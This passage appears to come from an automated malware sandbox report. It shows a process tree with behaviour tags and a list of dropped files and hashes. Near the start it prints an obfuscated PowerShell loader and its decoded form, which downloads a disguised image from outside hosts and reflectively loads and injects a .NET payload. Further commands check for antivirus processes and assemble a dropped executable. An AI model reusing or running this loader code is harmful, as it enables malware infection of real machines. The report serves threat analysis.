'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4724
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of SetThreadContext
                  PID:2912
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    8⤵
                    PID:4568
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    8⤵
                    PID:4872
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3988
        • C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe
          "C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe"
          3⤵
          • Enumerates VirtualBox registry keys
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          PID:4360
        • C:\Users\Admin\AppData\Local\Temp\1052897001\0f7cec18a3.exe
          "C:\Users\Admin\AppData\Local\Temp\1052897001\0f7cec18a3.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:4660
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2424
        • C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe
          "C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          PID:4288
        • C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe
          "C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          PID:628
        • C:\Users\Admin\AppData\Local\Temp\1052900001\d1253bb531.exe
          "C:\Users\Admin\AppData\Local\Temp\1052900001\d1253bb531.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:3064
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
            4⤵
            PID:1288
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              PID:4852
            • C:\Windows\SysWOW64\findstr.exe
              findstr /I "opssvc wrsa"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1448
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              PID:4692
            • C:\Windows\SysWOW64\findstr.exe
              findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
              5⤵
              PID:3532
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c md 764661
              5⤵
              PID:2432
            • C:\Windows\SysWOW64\extrac32.exe
              extrac32 /Y /E Fm
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1688
            • C:\Windows\SysWOW64\findstr.exe
              findstr /V "Tunnel" Addresses
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1384
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
              5⤵
              • System Location Discovery: System Language Discovery
              PID:456
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2600
            • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
              Macromedia.com F
              5⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2460
            • C:\Windows\SysWOW64\choice.exe
              choice /d y /t 15
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3832
        • C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe
          "C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:1028
        • C:\Users\Admin\AppData\Local\Temp\1052902001\9ebca9cb64.exe
          "C:\Users\Admin\AppData\Local\Temp\1052902001\9ebca9cb64.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:1172
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4960
    • C:\Users\Admin\AppData\Local\dllhost.exe
      C:\Users\Admin\AppData\Local\dllhost.exe
      1⤵
      • Executes dropped EXE
      PID:772
    • C:\Windows\system32\regsvr32.EXE
      C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv
      1⤵
      • Loads dropped DLL
      PID:3736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        PID:5096
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3832
    • C:\Users\Admin\AppData\Local\dllhost.exe
      C:\Users\Admin\AppData\Local\dllhost.exe
      1⤵
      • Executes dropped EXE
      PID:4504

              Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                661739d384d9dfd807a089721202900b

                SHA1

                5b2c5d6a7122b4ce849dc98e79a7713038feac55

                SHA256

                70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                SHA512

                81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                12c844ed8342738dacc6eb0072c43257

                SHA1

                b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

                SHA256

                2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

                SHA512

                e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                2ac3c9ba89b8c2ef19c601ecebb82157

                SHA1

                a239a4b11438c00e5ff89ebd4a804ede6a01935b

                SHA256

                3c2714ce07f8c04b3f8222dfe50d8ae08f548b0e6e79fe33d08bf6f4c2e5143e

                SHA512

                b1221d29e747b37071761b2509e9109b522cce6411f73f27c9428ac332d26b9f413ae6b8c0aeac1afb7fab2d0b3b1c4af189da12fe506287596df2ef8f083432

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                64B

                MD5

                1a11402783a8686e08f8fa987dd07bca

                SHA1

                580df3865059f4e2d8be10644590317336d146ce

                SHA256

                9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

                SHA512

                5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

              • C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE

                Filesize

                2.6MB

                MD5

                c43465bdafef9bcd7544afbe1dbbefa4

                SHA1

                6f5bbf2a7f8f744ea07e41509ced03784541e34c

                SHA256

                114c0e6cf7fe807f8a5c5fe70592fadca2369f771ecf3defa16787176289e493

                SHA512

                9e017db0e07cd51df25dd5641f1a537fce774a3154484d766e0d8303e6f10d233879d71d8a6e92071366ffb45aa8f12633712672cf112c77e430fa646f3a5291

              • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe

                Filesize

                9.8MB

                MD5

                db3632ef37d9e27dfa2fd76f320540ca

                SHA1

                f894b26a6910e1eb53b1891c651754a2b28ddd86

                SHA256

                0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d

                SHA512

                4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

              • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe

                Filesize

                1.8MB

                MD5

                8cd2034ffb65699b7ce76d746518ab6e

                SHA1

                155579dc7c4e0f40cd7490ca61fbbbaa0a306a27

                SHA256

                f2db20a1353bd4384ecb6a24fce94ceac73a32a12b654d15b559454ca686e2b4

                SHA512

                fdef7545e628555c69401e8ec1f8a785a1c058188e85a5eae547654d94efa6b19a9c2e69d14c35e6887febbd4777602d029c5b8e134217d0237bf693be1f8a07

              • C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe

                Filesize

                4.3MB

                MD5

                377d26c2e14018e30d78bd49db75a5cb

                SHA1

                afb14643291225d4f2b42636d14b613e914da616

                SHA256

                62a08329545fd97b1e9af7e3e141f70d5e3f9ca6748572ff6b37f6952b69d426

                SHA512

                3685200f70aed998b1390494e301e8669469ea5185aaa1475c92b9bd1bd1da63cbe388f97ad19e8f96b402afbbe42290bb0640f640e9f00c0e07fe0878d486b2

              • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe

                Filesize

                1.4MB

                MD5

                ebe8a0f61f53a3817c3fbcc3ab3a1f4c

                SHA1

                d87d66d53f29464d1f32b2c1e3b7ce507c51c40d

                SHA256

                27f53d6d1b4f4edb6c517ac1a517a4e9158d5d96eeccfd324c925d3772c3f44c

                SHA512

                33138b6fc03af9598821377dfdacaad64a56b7a05e7c7ae48de958e0002c8eec695e49633aec8be212be321f525ca165e40abf81bf0c69a57a0582f94698385b

              • C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe

                Filesize

                6.2MB

                MD5

                b874c330b2d5405ec75c422053198a88

                SHA1

                5f37baac1e873bf97746e9683c9ad62c5682d236

                SHA256

                1fb402868f12534dc3b8831b5d0b2eef484756079a0b5bd65befed716b9fda69

                SHA512

                462f6aec8a3769371e7b1ee3a4700e22187ccb00533d7cc877ed5b9577219ccbec6570b9407446157533d71b32c973604c8ce7c0c3d39b7cf6c4a7cf339015e3

              • C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe

                Filesize

                846KB

                MD5

                c3d89e95bfb66f5127ac1f2f3e1bd665

                SHA1

                bd79a4a17cc8ad63abdde20d9de02d55d54903f9

                SHA256

                5d07ad572a6a37d07d0b7ca990087960ad8850d7cfc56b8c7270c826c70fb56b

                SHA512

                d85116e24cf07f3063837fab1859ae6d9313dd269e28844900cbebe7521df8c65db97bc122bb097e9887d686bdf8f786b93a06208d762fded9035d2c6448a111

              • C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe

                Filesize

                160KB

                MD5

                2b988f03e35686cd9e998dce624dd35c

                SHA1

                3aea78ddff1d4b2102e7752bd5a21d2565c4475a

                SHA256

                ba910738be617d2334177f8498465e96c5c71d4f4a5f7b9d90bc94cc82fb5125

                SHA512

                e7d6083975ab958d2b91bd4305f3662b3cd618ec60e41a5d355bf98d61c28691bc62afabdd36f9827e186dd15f07e451967d9abe5aab06635bc538a5d6230bdd

              • C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe

                Filesize

                14.8MB

                MD5

                b537cdf797733314b4a1c835b7aa21d7

                SHA1

                362887ccfc36dba5944b3a56c1127f4d9589645b

                SHA256

                1b173e271544684f09d4a98414fe89b137fae7a7438527e31d6ff0e160f0cf9d

                SHA512

                4f78db4b182ae3e94a2f2db1aef05f5adf57426fd3a0558a0ca615f60246ad3aaa45068d2c098b83481db15b06798cf6082e6112c692036ce6053c75b5984dee

              • C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe

                Filesize

                938KB

                MD5

                9aac4fbdd126d1ed368b579e66838b05

                SHA1

                e2af7017b834da7cf37e0fcfdfb929edf2b159ac

                SHA256

                e677be671b4a5f1a062ecf3742684ea946b30079e9fd4b7b6d3b8910c3bdc504

                SHA512

                bd513f9eab9126786ea1736fb04af3acc9aa7f6ea6bbac57d25fec9e1e771421db5dd6a828c0d7355e8cfc373862227ba9d1c2fa7987267660505181bcb112b0

              • C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd

                Filesize

                2KB

                MD5

                189e4eefd73896e80f64b8ef8f73fef0

                SHA1

                efab18a8e2a33593049775958b05b95b0bb7d8e4

                SHA256

                598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

                SHA512

                be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

              • C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe

                Filesize

                1.8MB

                MD5

                c130357931a727566a3a776100cf1f02

                SHA1

                c5da4040d2179c7c2a4367e356c8b010b0eff326

                SHA256

                cba3aefa935818f76928c356d105d634363f6355a48e52ac321677d0a94504d1

                SHA512

                d8c960ee698f62a0477e23210b6ff66a8de38f1e34285e0106eb39c9d8c41d268117d59a5ee8bb18ba7d8a3dc04500b66c0ddc4353c6f48dbf1e5f6d6998bc89

              • C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe

                Filesize

                4.3MB

                MD5

                d3527dde5c35777831df5b047296dc0d

                SHA1

                9c821ab5317fb4bc93fb168c8f4e9b8958ee969e

                SHA256

                3c46d3be5eb550913a52a35db6e738d7f69fa052473d568f1ac74fd13219ea94

                SHA512

                dc90d44616d41e75c867232bdb74a1a76b405e3d27396a2a19b35ac1bbe083c44d351921e3e7c6d028c00be558369682d875a86317434b2a5cc846e8481ca056

              • C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe

                Filesize

                1.8MB

                MD5

                b04fbdc10c75213ac8e0af54425c9616

                SHA1

                7230666ba2d8ca2f64bbafa876861412e5470f8c

                SHA256

                785d4a5aea353d0150548869ced832f8714cb0d8891a343e0d701852e8a7d9ec

                SHA512

                b241a02d7336cd006606d389df8d03cd6fbddb03ed64700b2c53b90e7098e2a0feaa3d5cbc18039a29a0d18581b43c9a9be5b88d17a36bc8388b05557687ffe8

              • C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe

                Filesize

                1.8MB

                MD5

                b4692a52e2e93c70c4dba57014504076

                SHA1

                6c422a3a97884ac4b2cf0266d08333907913fa75

                SHA256

                2b68955728e8cb7eb91a381856f27c9799373b764df4963d8bd7a07a919d9b94

                SHA512

                4a6d92f5d2e2499bf8e64e0d744377ec2c49385e234fd7749764baf159bdd9872ba6f04a24be2348c8bccf064169adab61e3f863b1ad008ea7eb1cebcf71bdd4

              • C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe

                Filesize

                1.8MB

                MD5

                ef2aaf6328e522d6505a64978c956928

                SHA1

                d2ee3d6c5dd57a35549a752cf50e775ad01eeb76

                SHA256

                4204bff10546a4fff499e3638c08e0d1ca185cc2d9a25e79caa0e85aacd5e3d9

